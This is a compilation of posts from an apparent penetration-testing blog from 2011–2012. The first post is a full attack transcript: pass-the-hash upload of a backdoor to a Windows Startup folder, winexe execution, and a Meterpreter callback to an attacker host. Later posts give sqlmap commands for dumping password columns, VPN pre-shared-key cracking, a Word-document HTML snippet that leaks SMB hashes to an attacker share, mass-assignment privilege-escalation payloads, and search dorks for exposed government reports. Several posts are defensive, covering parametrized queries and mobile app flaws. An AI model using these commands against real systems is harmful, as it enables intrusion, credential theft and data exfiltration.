Carnal0wnage & Attack Research Blog

psexec fail? upload and exec instead

2012-01-23T14:28:00.000-05:00

I ended up having to use the smb/upload_file module on a pentest. I was able to get the local admin hashes but for some reason the psexec module wouldn't get code execution, it would act like it would work but wasn't. So we decided to push a binary, use winexe that was modified to pass the hash to exec the binary as needed. It went something like this...##################################################
# add a route to the 10.x network thru session 1
##################################################

msf exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added

#######################################################
# psexec wouldnt work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
######################################################
msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info

Name: SMB File Upload Utility
Module: auxiliary/admin/smb/upload_file
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
hdm

Basic options:

Name Current Setting Required Description
---- --------------- -------- -----------
LPATH yes The path of the local file to upload
RHOST yes The target address
RPATH yes The name of the remote file relative to the share
RPORT 445 yes Set the SMB service port
SMBSHARE C$ yes The name of a writeable share on the server

Description:
This module uploads a file to a target share and path. The only
reason to use this module is if your existing SMB client is not able
to support the features of the Metasploit Framework that you need,
like pass-the-hash authentication.

msf auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
smsf auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe"
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe...
[*] Connecting to the server...
[*] Mounting the remote share \\1.2.3.4\C$'...
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] Auxiliary module execution completed

################################################
#Set up a portforward to talk to hosts via SMB
################################################

meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445

#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################

user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 "cmd"
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : inside.company.com
IP Address. . . . . . . . . . . . : 1.2.3.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 1.2.3.254

C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0007-B088

Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup

01/13/2012 03:55 PM .
01/13/2012 03:55 PM ..
01/13/2012 03:55 PM 13,616 msf_backdoor.exe
1 File(s) 13,616 bytes
2 Dir(s) 241,661,345,792 bytes free

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>

[*] 5.5.5.5:4889 Request received for /INITM...
[*] 5.5.5.5:4889 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012

"Sanitize Input"

2012-01-13T12:38:00.000-05:00

When application security was still in it’s infancy, there were discussions on how to protect applications from newly discovered injection vulnerabilities. "Sanitize Input" was a popular solution that rolled off the tongue nicely and was not overly complicated to explain. It was also, a very generic solution that would (hopefully) be part of a more complete approach.

As much as "Sanitizing Input" makes sense, so does writing your code in a way which, allows you to handle failure safely. This way, when the unexpected does happen, an entire operation doesn't fall down, introduce a bug or propagate unsafe data.

Question: When does this approach fail miserably?

Answer: When it is the only approach you have.

The OWASP Top 10 categorizes XSS and SQL Injection separately. As an attacker, you are injecting data that is handled insecurely by application code. In this way, it is really just another form of injection. On that note, let’s discuss two manifestations of injection. SQL Injection and HTML Injection (XSS). I'd like to demonstrate other ways to think about or handle data beyond just "Sanitize Input". If you take away nothing more from this article, I'd like it to be that applications are unique, there is a level of complexity to design choices and solutions and there are more options than "Sanitize Input" available.

SQL Injection: "Save your one-liners for the bar". Parametrization of database queries is a classic method for handling queries safely and in many cases more efficiently. From a security standpoint, parametrized queries help to solidify the boundaries between user data and SQL statements. It ensures that data submitted by the user will be separated from the actual database query and won’t interfere with the SQL code and ultimately the database.

Example of lazy code....

http://www.example.com/example.php?user_name=gevans

$uname = $_GET['user_name']

....and this is the classic example everyone shows, nothing new here, that illustrates a SQL Injection flaw where the data ($uname) is actually included in the SQL statement.

"SELECT user_id from users where username = $uname;"

This programming flaw has destroyed the boundary between the SQL command and user-supplied input. Because the user data is now cast as a string-- it is no longer clear to the SQL server what part was supplied by the developer and what was supplied by the user. The whole query can fall apart by appending double quotes. This is not just a vulnerability, this is bad programming. Sure, it takes one line to write the query but there is no further sanity checking here. The string is formed, sent to the server, and executed as SQL. How are parametrized queries different?

Parametrized queries separate the data from the query so that we as coders don’t miscommunicate our intentions to the database server. How does it work? The majority of the query is sent to the server MINUS the actual user submitted data. So, the query is prepared (meaning sent to the server), a response comes back with a token (minus MySQL as I understand it), and THEN, the variable is sent to the server with the token and a SQL query executes. This means the expected query and actual data that we've gathered from the user are separated prior to execution.

Lets provide a visualization

// Pass in db credentials as well as the host it is located on and the database we'd like to connect to

$conn = new PDO("mysql:host=$dbhost;dbname=$dbname",$dbuser,$dbpass);

// Prepare the statement
$sql = "SELECT user_id from users where username = ?";

//Execute the query, taking in the variable data ($uname) from the user
$q = $conn->prepare($sql);
$q->execute(array($uname));
$object = $q->fetchColumn();

As you can see, the $sql statement is prepared and the server knows exactly what it should look like. Next, the SQL statement is executed, passing in the variable value in place of the "?" (shown above). By specifying that question mark, you tell the db, this is my statement but I don't know what the value will be.....I'll give you that on the next call.

Lets examine XSS. Again, something I hear a lot is "Sanitize your input". Some people even go as far as "Whitelist" versus "Blacklist". Okay, great, that is not extensible and ultimately context matters. What do I mean? It is a very one-sided approach with a lot of assumptions. Let me draw a picture for you. The understanding, as of right now, is the data comes in one place and is potentially echoed in another. So the model looks something like this:

A typical example would be a registration form. You sign up with your First Name, Last Name, etc. Upon successful authentication to the application, you notice a little message at the top right....

So....."Welcome, Ken!", I wonder where that value came from? When we registered, our information was stored in the db, later extracted after login, and shown on the page. Now, we should be safe right? Even if we had attempted to place JavaScript in the First Name value upon registration, it wouldn't have mattered.....We Sanitized!!!

Two months later, a user complains that they signed up with a misspelled username and would like the ability to change it. A new developer is assigned the task of adding the ability to edit your first and last name and does so. The new developers assumption is that we are going to safely handle that data when rendered to the user. But we aren't. We sanitized the input and didn't bother with handling the data. Our model has changed from Input/Output to......

So with one additional point of input, our model gets (very slightly) more complicated. Now imagine adding multiple points of input, multiple points of output. Now split input into data entry (processed), storage handling (stored in the db) and then do the same for output. While we are at, lets throw a web-service that consumes the data as well. It becomes very easy to see how "Sanitize Input" doesn't scale, isn't a sure-fire solution, and really oversimplifies the problem for those who are looking to either receive or give an easy answer.

In summary, please join me in the fight to stop the mindless regurgitation of old material.

Cheers,

Ken

Insecure Object Mapping

2011-12-20T08:00:00.000-05:00

Over the last two cycles of OWASP top 10, insecure direct object reference has been included as major security risk. An object reference is exposed and people can manipulate that to access other objects they aren’t supposed to. But an apparently lesser-known problem is when the object itself is directly exposed. This happens when an object maps user-controlled form data directly to it’s properties with out validation.

Perhaps this issue gets less press because every language calls this problem something different. In ruby, people call this mass assignment. In .NET and Java it’s often referred to as reflection binding. Regardless of name, it is how the object obtains it’s data which is of concern.

In ruby, vulnerable code might look like this:

     @foo = Foo.new(params[:foo])

The params call wants to make life easy and will automagically map any form data that matches the object’s parameters for you—unless you say otherwise. This is a very common convention used in MVC frameworks, because manually mapping a form POST to an object is annoying. The problem here is that it makes no difference to the controller whether you’ve exposed that field in the presentation layer. It just has to exist on the object.

In other words-- if you were updating a product quantity for your shopping cart, you might be able to change the price by guessing that a price field exists. Just add the price field to your POST parameters and it might override the value. This approach can be effective—but it is mostly a guessing game at that point. Some frameworks let you throw tons of arbitrary data and whatever sticks, sticks. Others will barf on invalid parameters.

There is a second route, however, which is why vulnerability deserves more attention. When I said that you are allowed to map to anything on the object, I meant it. You can map complex objects to other complex objects, as far as they related to each other. Lets look at an example in C#:

     public class Foo {
          public string name { get; set;}
          public Bar myBar { get; set;}
     }

     public class Bar {
          public string name { get; set;}
          public bool is_admin = { get; set;}
     }

Two basic classes, foo and bar. Foo has a reference to bar. In MVC.Net, you bind a controller action to “create” Foo as such:

     public class FooController {
          [HttpPost]
          public ActionResult Create (Foo foo){
               /* save Foo to database */
               return View();
          }
     }

Behind the scenes, the framework maps all of the form data directly into the foo object. Developers also sometimes do this directly by calling the UpdateModel() function. In either usage, if someone sent a malicious POST to the “Create” view:

     Foo.Bar.name=“hello”&Foo.Bar.is_admin=true&Foo.name=“myfoo”;

You’d end up with a full fleshed out object where:

     Foo.name = “myfoo”
     Foo.Bar.name = “hello”
     Foo.Bar.is_admin = true

The Bar object is instantiated automatically through it’s empty constructor, and it’s properties are mapped as well. Any reference the exposed object has, you can bind to. This also works for arrays of simple or complex types too. If instead of a single instance you had an array or List<Bar> you would just do the following:

     Foo.Bar[0].name=“hello”&Foo.Bar[0].is_admin=true

With out any other validations, this is all kosher.

In the wild I’ve used this attack to escalate privileges by updating my profile and walking down to a permissions table. I’ve also run across places where you could register every user to come to an event. And another instance where you could take over other people’s blog posts simply by editing your own profile.

If you search for this during tests, here are some key things I’ve learned:

This vulnerability is best identified with access to source code—and very few developers seem to protect against it.
When reviewing code, pay attention to how the constructor works and how fields are set on the object. Some properties are set via functions and you can’t bind them directly. Other objects don’t have empty constructors. This causes the attack to fail.
I frequently find this vulnerability on “update” and “create” controller actions.
You can, and I have, found this w/o source—its just harder. You do so by creating a loose type map through browsing the site.

You can create a type map by following a process like this:

Going to the object's “create” page and note all the form fields that are there. That is your basic “object”. As you see these objects in other places on the site, they might reveal more about their structure.
The site will guide you in what you need to know about object relationships. If you are looking at your cart, and it has a list of products & their details-- the cart object has a list of products.
For everything else, there are common object relationships you can just assert. Carts do generally have products, just as people generally have permissions. Take some time and look over common object models on the interwebs.

This attack route exists on pretty much every MVC based framework. In particular, Spring, Struts, MVC.Net and Ruby on Rails are all vulnerable. Maybe others, but those are so popular I’ve not really looked much deeper into it.

It is true that developers can prevent this by white listing specific fields to bind—but they don’t. The whole point of the convenience functions is convenience. If you’ve built an MVC application and didn’t go out of your way to protect against this—you are most likely vulnerable to it.

Happy hunting.

-kuzushi

Not 0wning That ColdFusion Server but Helping...

2011-12-13T07:20:00.000-05:00

Stephen, @averagesecguy, wrote a post on owning a ColdFusion server. its pretty good and he wrote some code to help things along.

Code: https://github.com/averagesecurityguy/scripts

I thought I'd add to the conversation with some stuff I found doing CF research. The code he wrote and the metasploit module works great if things are in their default locations. Of course, this will never be the case when you are on a PT and need to break into that mofro.

Anyway, there is a misconfiguration that, when its present, can greatly help you exploit that locale traversal attack. Alot of time you can get the sha1.js and verify that the patch is not applied.

Anyway, more than once I've gotten that far but the host was Linux and locating the password.properties file failed. You're essentially guessing blind. So what i discovered is that sometimes the componentlist.cfm [Site/CFIDE/componentutils/componentlist.cfm] file is available. It looks like this:

Click on one of the components and you get full path to the installed component:

Not the best example, because stuff is where we would expect it to be. This one is better:

Now you know where to direct that directory traversal to get the proper file.

Other reading:
http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

Root that Motorola Xoom and Get You Some BT5

2011-12-11T19:29:00.006-05:00

Rooting the Xoom and putting BT5 on it...

Check out

http://wiki.rootzwiki.com/Motorola_Xoom

For instructions to get android sdk (adb/fastboot) up and running. fastboot wasnt in the current sdk. i downloaded release 1.6.r1 from http://developer.android.com/sdk/older_releases.html and put that in my platform-tools directory.

Links for the root image and what not are busted there, so go to

http://www.xoomforums.com/forum/motorola-xoom-development/9621-root-universal-xoom-root-any-xoom-any-update.html

Follow instructions. make sure to copy the Xoom-Universal-Root.zip to EXTERNAL sdcard before you start :-)

I followed the instructions exactly as written and after reboot the Xoom was rooted.

For BT5:

go here http://www.backtrack-linux.org/downloads/, download BT5 for ARM.

unzip file, follow instructions in readme. It takes awhile to copy and extract things. I had two adb shells so i could watch the progress.

Similar instructions here: http://www.secmaniac.com/blog/2011/05/15/backtrack-5-on-motorola-xoom-in-10-minutes-or-less/

The result:
Of course, about 5 seconds of trying to type on it made me not think it was so cool. So if there is an easy way to make it suck less to send text the console let me know.

SQLMap -- Searching Databases for Specific Columns/Data & Extracting from Specific Columns

2011-12-09T10:17:00.014-05:00

So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.

To search all databases for 'password'

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'

To search a specific database for 'password'

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'

**note, that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs**

[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'

You'll get asked:

do you want sqlmap to consider provided column(s):

[1] as LIKE column names (default)
[2] as exact column names
> 1

You'll want to give it a 1 first time around, it will probably give you stuff like this:

[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords

We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1

You could also just do a dump if you want to start grabbing data

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1

If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <--sometimes works, sometimes doesnt. Not sure whats up with that.

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10

If you just want to just pull out certain columns you can do something like this (assuming columns LogonId and Password):

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10

I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)

-CG

Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain

2011-12-07T21:44:00.030-05:00

There hasnt been much in the way of updates on breaking into VPN servers that have aggressive mode enabled.

ike-scan is probably still your best bet.

If you have no idea what i'm talking about go read this:
http://www.sersc.org/journals/IJAST/vol8/2.pdf and
http://www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:

$ sudo ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)

To save with some output:

$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

Once you have you psk file to crack you're stuck with two options psk-crack and cain

psk-crack is fairly rudamentary

to brute force:

$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

To dictionary attack:

$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)

You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack.

Embeding A Link To A Network Share In A Word Doc

2011-11-29T00:46:00.018-05:00

Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":


[html][body][img src="\\192.168.26.133\share\pwn.jpeg"
 width=1 height=1][/body][html]

Once that is done go to insert-->object--text from file-->select your HTML file

Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.

If this doesnt work for anyone let me know.

Oracle Report Server - 2-cent hack trick

2011-11-27T14:09:00.002-05:00

I am now working on pentest in a government unit in Hong Kong, they simply expose numerous sexy confidential reports in their Oracle Report Server:

I would like to highlight two interesting points:
1. Execute servlet commands
http://reports.somethingoracle.com/reports/rwservlet

2. Get some confidential reports from Google or target
inurl:reports/rwservlet

For example, you could know other project fund from government
https://app.somethingoracle.com/reports/rwservlet?epm+report=epm345_stip_report.rdf+p_stip_year=2009+p_incld_transit=YES+p_break_type=R+p_draft_rept=NO

Enjoy :)

- Darkfloyd

Oracle Web Hacking Part II

2011-11-22T10:47:00.004-05:00

Part II of the articles based on my Hacking Oracle Web Applications talk was posted on EthicalHacker.net today. Head over there to check it out.

Oracle Web Hacking Part II

Oracle Web Hacking Part I

Weekly "That's Interesting" Wrap-Up 18 Nov 2011

2011-11-13T10:24:00.011-05:00

Break into other people's vuln scanners...or just waste your pentester's time...
https://github.com/kost/vulnscan-pwcrack

TrueCrypt guesser is pretty neat too
https://github.com/kost/tc-guesser

unlock with my face, or a picture of my face...no difference :-<
http://www.youtube.com/watch?v=BwfYSR7HttA

signing malware with legit certs...booyah
http://www.f-secure.com/weblog/archives/00002269.html

cracking Siri

http://applidium.com/en/news/cracking_siri/

HBGary: The New Battlefield: Fighting and Defeating APT Attacks in the Enterprise

http://www.hbgary.com/attachments/thenewbattlefield.pdf

*You can stop reading at the beginning of the sales pitch :-)

Weekly "That's Interesting" Wrap-Up 11 Nov 2011

2011-11-11T21:30:00.000-05:00

Intersystems Cache Database

I know, had never heard of it either. But here are some commands so you can enum some version and other system type infoz:

http://docs.intersystems.com/cache20111/csp/docbook/DocBook.UI.Page.cls?KEY=RSQL_cosvariables

Hacking Satellites
http://www.dailymail.co.uk/news/article-2055311/Hackers-infiltrate-US-satellites-taken-complete-control-achieving-steps-required-command-satellite.html

Finally a decent APT article
http://krebsonsecurity.com/2011/10/chasing-apt-persistence-pays-off/

decent APT advice
http://blog.deepsec.net/?p=684

Joe McCray made an APT resource
http://advanced-persistent-threat.com/

More Duqu stuff http://www.securelist.com/en/blog/208193243/The_Duqu_Saga_Continues_Enter_Mr_B_Jason_and_TVs_Dexter

Lets Get Real

2011-11-10T12:37:00.005-05:00

We work in a variety of large environments, networks from 30k hosts up to 100k hosts and like many of you one of our jobs is to provide security advice to our customers. In the infosec industry many times this advice involves recommending things like patching, AV selection, FW rules, SEIMs, reverse engineering tools, app review, etc. (and most often purchasing more assessments ;)

However what we are finding most often is many places aren't even ready to deal with implementing advanced security as their basic IT operations are not in order. How many times have you pen tested a customer and heard "oh yeh that belongs to the desktop support group, good luck getting anything done there"?

Many times we have generated a number of serious alerts on a sensitive server including the use of stolen cached domain admin credentials, password dumping tools and even rebooting the server itself. We will see a ticket generated in the support system, an admin looks at the sever, fills out the ticket and says: "AV caught the attempt and the server came back up fine" ticket closed. Often users won't report anything suspicious, even when our actions are blatant, because they are so accustomed to everything being broken and unstable.

Beyond automating patch Tuesday and keeping AV up to date, and definitely beyond exploits, memory protections and reverse engineering, the most serious problem in security is that organizations lack even basic capabilities in managing their enterprises. Who's running still running XP SP2 (a vastly less secure OS than Win7) because of the expense involved in updating the enterprise? Businesses need security help that is willing to negotiate the maze of business concerns and understand enterprise IT needs in addition to being technically astute in security.

We've been to large companies where getting a network port to plug into to start testing can take 2 weeks. Where finding someone who understands how servers are configured or even how many servers there are can be a challenge. Environments that don't know what computers are on their own networks. Sure security needs to be built into the whole process, but I wonder, have we focused too much on what we want to do and not enough on what the customer's actually need?

Its not sexy or headline generating work, but little is more critical.

Val

Common mobile app vulnerabilities

2011-11-02T08:46:00.000-04:00

After testing a fair number of mobile applications I thought I would share 3 of the most common vulnerabilities I've come across thus far. In regards to scope, when referring to "mobile applications", we really mean both the mobile application and the web-service.

"Hide-a-key-in-a-neon-pink-plastic-rock-next-to-the-front-door" storage:

This appears to be the most prevelant issue by far that I've come across. Insecure implementations include:

1) Storing plain-text credentials in a SQLite database
2) Storing XML files that contain plain-text credentials or other sensitive account details
3) Storing plain-text credentials in a system wide database (e.g. - accounts.db/Android)

Moral of the story is, if a mobile device is lost or stolen (happens way more often than it should), credentials are ripe for the picking. Physical access is not always required of course. Anyway, pretty much anyone who has spent 2 minutes on "The Googles" can find out where you are storing your metaphorical "house keys". There are solutions to this problem, for instance, I've heard great things about Android-SQLCipher and don't forget about platform API solutions as well (if your not a fan of third party libraries).

Crappy session handling:

I don't think this title will ever make its way on to an OWASP Top 10 but it certainly reflects the issue accurately. Not to say this is limited only to Mobile Apps & Web Services, far from it, it is just very common amongst them.

Examples -

So, here is a fun one, pure basic-authorization schemas . You typically see this in a SOAP-service-to-Mobile-App architecture but obviously the two aren't mutually exclusive. For those not familiar with basic-authorization, it means the user's credentials are sent in the standard basic-auth format (Base64 encoded user:password). The problem occurs when, instead of leveraging a session handling schema, the user/password combo is sent with every request to the web-service as a means to authenticate the user for the requested resource. There are many disadvantages. Namely, if SSL isn't in play, you've increased the likelihood that the credentials will be stolen (ahhh....... lattes, croissants and good ol' packet sniffing). Additionally, because you haven't a session to destroy, there is no inactivity lock-out. Typically the creds are stored (plain-text of course) on the device, retrieved by the app and then sent in the request on a per-request basis. This means, the person on that device may not be the person you intended to view potentially sensitive information.

Another big session-related issue is leveraging device identifiers or good old client-side data to control privileges of a user. Imagine the classic parameter tampering (userid=100 becomes userid=101) but this time with the UUID of an iPhone device. The classic session identifier -> user map -> role enforcement still works so it is unnecessary to build your schema in this way.

API Keys, Test Accounts and Dirty Laundry

From test account credentials along with the test URL, which provided juicy insight into the inner workings of an architecture to the personal email addresses of developers (think - social engineering/username enumeration), the list of things put into the source code can still be fairly surprising.

These applications are reversible. Especially Android apps, between dex2jar/apktool/jd-gui.......its pretty easy to see things not intended for your eyes. Developers need to scrub sensitive data prior to sending the code out for production and treat data like its a public blog post......everyone can read it. Oh, and make sure you aren't hard-coding API or encryption keys!

Okay, so those titles will never end up on a Top 10 but the content has! I would encourage those interested to check out the OWASP Mobile Top 10 Risks and please, don't forget the project always needs additional collaborators.

Cheers,

Ken

nessuscmd for scanning a host with a subset of plugins

2011-11-01T16:22:00.004-04:00

Need to check a few specifc nessus plugins against a host?

$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107

Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...

Host 192.168.1.92 is up

Discovered open port http (80/tcp) on 192.168.1.92

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157 Synopsis :
The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also : http://www.microsoft.com/Sharepoint/default.mspx

Solution : Make sure the proper access controls are put in place

Risk factor : None

Plugin output : The following instance of SharePoint was detected on the remote host :

Version : 12.0.0.6327
URL : http://192.168.1.92/

looks like the functionality has been there for awhile:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html

Weekly "That's Interesting" Wrap-Up 21 Oct 2011

2011-10-15T10:08:00.002-04:00

TEDxRotterdam - Mikko Hypponen - safe internet will lead the future

http://youtu.be/WQgeUHlTThc

Similar to his other TED talk but worth the 20min. Its good up to "fixing things". Not sure I agree with his "fixes". I do agree with a more unified way to fight/arrest/ cyber criminals, but bottom line its still way too easy to break into stuff and still to easy to conduct Credit Card fraud. We need to adress some of that as well.

Also, I think plenty of people would disagree that anything Mac is "safe" because of market share.

OMG OMG OMG Stuxnet Part 2 or the parent of stuxnet or whatever
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Samples:
http://contagiodump.blogspot.com/2011/10/duqu-rat-trojan-precursor-to-next.html

Volatility Memory Forensics Federal Trojan aka R2D2

http://www.evild3ad.com/?p=1136

Weekly "That's Interesting" Wrap-Up 14 Oct 2011

2011-10-07T15:01:00.007-04:00

Bios Rootkits (mebromi)
http://blog.webroot.com/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/

Apache reverse proxy (mod-rewrite) bypass vuln details
http://www.contextis.com/research/blog/reverseproxybypass/

CCC Analyzes government malware (In German, go go gadget google translate)
http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf

http://m.zdnet.com/blog/hardware/can-you-trust-your-antivirus-solution-to-protect-you-against-governmental-backdoors-and-lawful-interception-police-trojans/15280

Tips for evading AV during Pentests
http://pen-testing.sans.org/blog/2011/10/13/tips-for-evading-anti-virus-during-pen-testing

Check out the conversation between Dave Kennedy and Rafal Los on CSOs, popping shells, #secBiz from 13 Oct
https://twitter.com/#!/dave_rel1k
https://twitter.com/#!/Wh1t3Rabbit

Lastly, from the "no more free bugs" and "hey companies, this is NOT how you behave to people that report vulns" categories

"Security researcher threatened with vulnerability repair bill"
http://www.scmagazine.com.au/News/276780,security-researcher-threatened-with-vulnerability-repair-bill.aspx

Weekly "That's Interesting" Wrap-Up 7 Oct 2011

2011-10-06T22:10:00.006-04:00

i'm probably gonna fail miserably at regularly posting anything but F it, im motivated right now and that's what matters.

So interesting stuff this week.

DerbyCon videos are slowly being posted. they're here:
http://www.irongeek.com/i.php?page=videos/derbycon1/mainlist

Specifically, watch Chris Nickerson's talk. Its funny and has a point.
http://www.irongeek.com/i.php?page=videos/derbycon1/chris-nickerson-compliance-an-assault-on-reason

So far i've watched Carlos Perez's and Rick Redman's, both were good. Caught most of jadedsecurity's on track2, also good.

SK Hack by an Advanced Persistent Threat
http://www.commandfive.com/papers/C5_APT_SKHack.pdf

Coldfusion is interesting to me, specially with the tight java intergration. You can do alot with it. The future of coldfusion from ColdFusionJedi
http://www.coldfusionjedi.com/index.cfm/2011/10/4/My-MAX-Preso--the-future-of-ColdFusion

The rest of the stuff that was interesting is shared via google reader:
http://www.google.com/reader/shared/carnal0wnage

ncrack with domain creds

2011-09-30T07:11:00.003-04:00

little post on using ncrack to brute/check domain creds

